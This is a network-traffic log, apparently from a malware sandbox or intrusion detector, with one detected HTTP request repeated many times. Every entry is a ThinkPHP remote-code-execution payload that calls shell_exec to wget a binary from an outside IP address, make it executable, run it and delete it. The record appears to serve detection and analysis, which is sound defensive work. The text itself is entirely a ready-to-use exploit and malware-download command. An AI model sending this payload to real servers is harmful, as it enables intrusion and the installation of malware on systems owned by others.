Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
